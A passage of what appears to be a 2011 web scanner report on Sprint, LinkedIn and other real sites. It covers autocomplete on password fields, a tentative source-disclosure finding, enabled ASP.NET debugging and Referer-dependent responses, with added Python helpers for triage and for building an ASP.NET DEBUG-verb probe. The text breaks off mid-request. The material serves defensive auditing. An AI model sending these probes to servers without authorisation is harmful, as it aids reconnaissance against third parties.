       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.5. http://community.sprint.com/baw/index.jspa

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/index.jspa

Issue detail

The page contains a form with the following action URL:
https://mysprint.sprint.com/entrycheck/login.fcc
The form contains the following password field with autocomplete enabled:
<input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/>

Request

GET /baw/index.jspa HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:43 GMT
Server: Apache-Coyote/1.1
X-JAL: 314
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=445807 t=1315099123758151
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 169328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.6. http://community.sprint.com/baw/reviews.jspa

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/reviews.jspa

Issue detail

The page contains a form with the following action URL:
https://mysprint.sprint.com/entrycheck/login.fcc
The form contains the following password field with autocomplete enabled:
<input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/>

Request

GET /baw/reviews.jspa HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:19:04 GMT
Server: Apache-Coyote/1.1
X-JAL: 243
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=366326 t=1315099144439190
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 90192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.7. https://www.linkedin.com/secure/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The page contains a form with the following action URL (the relative action="/secure/login" resolved against the page):
https://www.linkedin.com/secure/login
The form contains the following password field with autocomplete enabled:
<input type="password" name="session_password" value="" id="session_password-login" tabindex="2">

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...
</script>


<form action="/secure/login" method="POST" accept-charset="UTF-8" name="login"> <input type="hidden" name="csrfToken" value="ajax:6215476003437015226">
...[SNIP]...
<div class="fieldgroup">

<input type="password" name="session_password" value="" id="session_password-login" tabindex="2">
<a href="http://www.linkedin.com/passwordReset?trk=signin_fpwd" class="nav-link">
...[SNIP]...

13.8. http://www.sprint.com/index_c.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /index_c.html

Issue detail

The page contains a form with the following action URL:
https://mysprint.sprint.com/entrycheck/login.fcc
The form contains the following password field with autocomplete enabled:
<input type="password" name="PASSWORD" id="txtLoginPassword" class="text" />
As in 13.1, the form is served over plain HTTP (http://www.sprint.com) although it posts to an https:// URL.

Request

GET /index_c.html HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]; segment_user=consumer; user=xyz%7Cconsumer; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=sprintuniversalsiteprod%3D%2526pid%253DHP%252520%25253A%252520IHP%252520%25253A%252520Sprint%252520Home%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.sprint.com%25252Findex_c.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:34 GMT
Server: Apache/2.2.14 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 41758
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
                           <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
                               <fieldset>
...[SNIP]...
<br />

                                       <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" />                                        
                                   </div>
...[SNIP]...

13.9. https://www.sprint.net/performance/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The page contains a form with the following action URL (the relative action="/login" resolved against the page):
https://www.sprint.net/login
The form contains the following password field with autocomplete enabled:
<input name="pass" size="20" type="password">

Request

GET /performance/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:32 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<div id="login_form" class="ui-corner-all">
                       <form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
                   <input name="z" value="" type="hidden">
...[SNIP]...
</p>
               <input name="pass" size="20" type="password">

                   <div>
...[SNIP]...

13.10. https://www.sprint.net/performance/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /performance/

Issue detail

The page contains a form with the following action URL (the relative action="/login" resolved against the page):
https://www.sprint.net/login
The form contains the following password field with autocomplete enabled:
<input name="pass" type="password" size="20" />
This is a second login form further down the same page as 13.9 (the request and response are identical); both forms post the same field names to the same endpoint.

Request

GET /performance/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:32 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<div style="margin-top: 0; border-top: 1px solid #C1C1C1; padding: 5px 0px 0px 15px;">
<form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
<input type="hidden" name="z" value="" />
...[SNIP]...
</p>
<input name="pass" type="password" size="20" />
<input style="margin-top: 10px;" name="signin" type="image" value="login" src="/images/signin.jpg" alt="sign in" />
...[SNIP]...

14. Source code disclosure
There are 4 instances of this issue:

Issue background

Server-side source code may contain sensitive information (database credentials, internal hostnames, application logic) which can help an attacker formulate attacks against the application. The four instances below all rest on the same fragment, <%= body %>, and the scanner attributes it to ASP; the <%= ... %> delimiters are shared by ASP, JSP and ERB, and are also used by several client-side JavaScript template engines. On this host (Server: Apache-Coyote/1.1, .jspa URLs, a Java-based Jive forum) a fragment that survives unrendered inside textareas belonging to the comment editor is at least as likely to be a client-side template delivered on purpose as a leaked server-side file, which is why the confidence is Tentative. Confirm that the fragment comes from a file that should have been executed before treating it as disclosure.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
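A triage helper, added here as an example and not part of the scanner report: it finds unrendered scriptlet delimiters in a response body and records where each one sits, so that fragments inside a textarea or script block (usually a client-side template shipped deliberately) are separated from code leaked into ordinary markup. The sample body is constructed: the two textareas are copied from the community.sprint.com responses in this section; the third fragment is invented for contrast.

```python
# Added example, not part of the scanner report.
import re

# ASP/JSP/ERB scriptlets and PHP tags. The XML declaration <?xml ... ?> is
# deliberately not matched.
SCRIPTLET = re.compile(r"<%[=@!#]?.*?%>|<\?php\b.*?\?>|<\?=.*?\?>", re.DOTALL)


def _inside(body, pos, tag):
    """True if offset pos lies after an opening <tag that has not yet been closed."""
    before = body[:pos].lower()
    return before.rfind("<" + tag) > before.rfind("</" + tag)


def find_scriptlets(body):
    """Return one record per scriptlet-like fragment with its line and context."""
    hits = []
    for m in SCRIPTLET.finditer(body):
        if _inside(body, m.start(), "textarea"):
            context = "textarea"
        elif _inside(body, m.start(), "script"):
            context = "script"
        else:
            context = "markup"
        hits.append({
            "fragment": m.group(0),
            "line": body.count("\n", 0, m.start()) + 1,
            "context": context,
            # Only a fragment in ordinary markup is treated as probable
            # disclosure; the other contexts need manual confirmation.
            "likely_disclosure": context == "markup",
        })
    return hits


# Constructed sample body: two textareas from the Sprint responses plus an
# invented fragment in ordinary markup.
SAMPLE_BODY = """<html><body>
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
<p>Welcome back, <%= request.getParameter("user") %></p>
</body></html>"""

if __name__ == "__main__":
    for h in find_scriptlets(SAMPLE_BODY):
        flag = "DISCLOSURE?" if h["likely_disclosure"] else "template"
        print(f"line {h['line']}: {h['fragment']:<45} in {h['context']:<8} {flag}")
```

Run it over the full saved response rather than the snippet the scanner shows; the context check only works when the opening tag is in the text you pass in.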


14.1. http://community.sprint.com/baw/community/buzzaboutwireless

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless

Issue detail

The response contains an unrendered scriptlet-style fragment, <%= body %>, inside two comment-editor textareas; the scanner attributes it to ASP with Tentative confidence.

Request

GET /baw/community/buzzaboutwireless HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 186
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130313b31342c323130323b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=346147 t=1315099124916508
Connection: close
Content-Length: 138024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

14.2. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The response contains an unrendered scriptlet-style fragment, <%= body %>, inside two comment-editor textareas; the scanner attributes it to ASP with Tentative confidence.

Request

GET /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:54 GMT
Server: Apache-Coyote/1.1
X-JAL: 270
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323130313b31342c323130323b31342c323032383b31342c323037333b; Expires=Tue, 04-Oct-2011 01:18:54 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=424084 t=1315099134687160
Connection: close
Content-Length: 156782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

14.3. http://community.sprint.com/baw/community/sprintblogs

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs

Issue detail

The response contains an unrendered scriptlet-style fragment, <%= body %>, inside two comment-editor textareas; the scanner attributes it to ASP with Tentative confidence.

Request

GET /baw/community/sprintblogs HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 95
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130323b31342c323130313b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=222160 t=1315099125905413
Connection: close
Content-Length: 115606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

14.4. http://community.sprint.com/baw/index.jspa

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://community.sprint.com
Path:   /baw/index.jspa

Issue detail

The response contains an unrendered scriptlet-style fragment, <%= body %>, inside two comment-editor textareas; the scanner attributes it to ASP with Tentative confidence.

Request

GET /baw/index.jspa HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:43 GMT
Server: Apache-Coyote/1.1
X-JAL: 314
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=445807 t=1315099123758151
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 169328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

15. ASP.NET debugging enabled
There are 2 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the application's Web.config, find the <compilation> element within the <system.web> section, and set its debug attribute to "false". Debugging can also be enabled for every application on the host in Machine.config, so confirm that the debug attribute of the <compilation> element has not been set to "true" there either. On production hosts, <deployment retail="true"/> in the <system.web> section of Machine.config forces debug="false" (and disables trace output and detailed error pages) for all applications regardless of their own Web.config.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.
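Two checks for this issue, added here as an example and not part of the scanner report: one audits a Web.config or Machine.config fragment for the settings named in the remediation, the other builds the DEBUG-verb probe the scanner sent and interprets the reply. The config fragments are constructed for illustration; the sample response is the one recorded under 15.1. The "OK" body expected from a permitted debug session is an assumption about the debug handler, not something this report shows.

```python
# Added example, not part of the scanner report. Standard library only.
import xml.etree.ElementTree as ET


def _system_web_child(config_xml, child):
    root = ET.fromstring(config_xml)
    system_web = root.find("system.web")
    return system_web.find(child) if system_web is not None else None


def compilation_debug_enabled(config_xml):
    """True if <configuration>/<system.web>/<compilation debug="true"> is set.
    A missing element or attribute means debugging is off (the ASP.NET default)."""
    comp = _system_web_child(config_xml, "compilation")
    if comp is None:
        return False
    return comp.get("debug", "false").strip().lower() == "true"


def retail_mode(config_xml):
    """True if <deployment retail="true"/> is present (Machine.config only);
    it overrides debug="true" in every application's Web.config."""
    dep = _system_web_child(config_xml, "deployment")
    return dep is not None and dep.get("retail", "false").strip().lower() == "true"


def build_debug_probe(host, path="/Default.aspx"):
    """The raw request the scanner sent: an ASP.NET-specific DEBUG verb."""
    return f"DEBUG {path} HTTP/1.0\r\nHost: {host}\r\nCommand: start-debug\r\n\r\n"


def classify_debug_response(raw):
    """Map the probe's reply onto the outcomes the scanner distinguishes."""
    status_line, _, rest = raw.partition("\r\n")
    _, _, body = rest.partition("\r\n\r\n")
    status = int(status_line.split()[1])
    body = body.strip()
    if status == 401 and body.startswith("Debug access denied"):
        return "enabled, platform authentication required"   # both instances above
    if status == 200 and body == "OK":
        # Assumed: the debug handler's reply when the caller is permitted.
        return "enabled and accessible to this user"
    return "no debug handler reached"


# Constructed config fragments: the weak setting and a corrected one.
WEAK_CONFIG = """<configuration>
  <system.web>
    <compilation debug="true" />
  </system.web>
</configuration>"""

FIXED_MACHINE_CONFIG = """<configuration>
  <system.web>
    <compilation debug="false" />
    <deployment retail="true" />
  </system.web>
</configuration>"""

# The reply recorded under 15.1 (headers abbreviated).
SAMPLE_RESPONSE = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    'WWW-Authenticate: Basic realm="usata1.gcion.com"\r\n'
    "X-AspNet-Version: 2.0.50727\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 39\r\n"
    "\r\n"
    "Debug access denied to '/Default.aspx'."
)

if __name__ == "__main__":
    print("weak config debug enabled:", compilation_debug_enabled(WEAK_CONFIG))
    print("fixed config debug enabled:", compilation_debug_enabled(FIXED_MACHINE_CONFIG),
          "retail:", retail_mode(FIXED_MACHINE_CONFIG))
    print(build_debug_probe("usata1.gcion.com"))
    print("probe result:", classify_debug_response(SAMPLE_RESPONSE))
```

The config audit is the part worth wiring into a deployment pipeline; the probe only tells you what the scanner already reported.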



15.1. http://usata1.gcion.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://usata1.gcion.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging. Here the challenge is HTTP Basic on a plain http:// host, so any platform credentials presented to the debug handler would travel base64-encoded in the clear.

Request

DEBUG /Default.aspx HTTP/1.0
Host: usata1.gcion.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Sun, 04 Sep 2011 00:52:45 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="usata1.gcion.com"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.2. http://www.wisdomtree.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wisdomtree.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging. Here the server offers Negotiate and NTLM, so the credentials in question are Windows (domain) accounts.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wisdomtree.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 01:20:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16. Referer-dependent response
There are 4 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
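How to confirm a finding of this kind by hand, as an added example that is not part of the scanner report: send the same request with and without a Referer header, then compare the two responses while ignoring headers that change on every request, so that only Referer-driven differences remain. The two sample responses are constructed from the ads.adbrite.com pair in 16.1 (bodies shortened to a placeholder); the set of volatile headers is my choice, not the scanner's.

```python
# Added example, not part of the scanner report. Standard library only.

# Headers expected to differ between any two requests; they carry no signal.
VOLATILE_HEADERS = {"date", "content-length", "connection", "keep-alive",
                    "x-fb-server", "x-cnection"}


def parse_response(raw):
    """Split a raw HTTP response into status, headers, Set-Cookie pairs and body."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    status = int(lines[0].split()[1])
    headers, cookies = {}, {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "set-cookie":
            # Keep only name=value; path/domain/expires attributes are not the signal.
            cname, _, cval = value.split(";", 1)[0].partition("=")
            cookies[cname.strip()] = cval.strip()
        else:
            headers[name] = value
    return {"status": status, "headers": headers, "cookies": cookies, "body": body}


def referer_diff(with_referer, without_referer, ignore_cookies=()):
    """Report what changed between the two variants. Cookies that vary on
    every request (found by sending the same variant twice) go in ignore_cookies."""
    a, b = parse_response(with_referer), parse_response(without_referer)
    diff = {"status": None, "headers": {}, "cookies": {},
            "body_same": a["body"] == b["body"]}
    if a["status"] != b["status"]:
        diff["status"] = (a["status"], b["status"])
    for h in sorted(set(a["headers"]) | set(b["headers"])):
        if h not in VOLATILE_HEADERS and a["headers"].get(h) != b["headers"].get(h):
            diff["headers"][h] = (a["headers"].get(h), b["headers"].get(h))
    for c in sorted(set(a["cookies"]) | set(b["cookies"])):
        if c not in ignore_cookies and a["cookies"].get(c) != b["cookies"].get(c):
            diff["cookies"][c] = (a["cookies"].get(c), b["cookies"].get(c))
    return diff


# Constructed from the two responses in 16.1; the GIF body is a placeholder.
WITH_REFERER = """HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com
Content-Length: 42

GIF89a..."""

WITHOUT_REFERER = """HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Server: XPEHb/1.0
Set-Cookie: ut=; path=/; domain=.adbrite.com; expires=Sun, 04-Sep-2011 00:57:44 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Sun, 04-Sep-2011 00:57:44 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjS8Za2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com
Content-Length: 42

GIF89a..."""

if __name__ == "__main__":
    # rb2 changes between the two real responses as well; treat it as noise
    # until a repeated request with the same Referer shows it stable.
    for name, value in referer_diff(WITH_REFERER, WITHOUT_REFERER, ignore_cookies=("rb2",))["cookies"].items():
        print(f"cookie {name}: with Referer={value[0]!r}  without={value[1]!r}")
```

In the sample the body and stable headers are identical; what depends on the Referer is the vsd cookie, which records the referring host when one is supplied and is cleared (together with ut) when none is. Because the Referer is fully under the requester's control, any value the server stores from it, as here, should be handled as untrusted input, which is the point of the remediation above.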



16.1. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Request 1

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
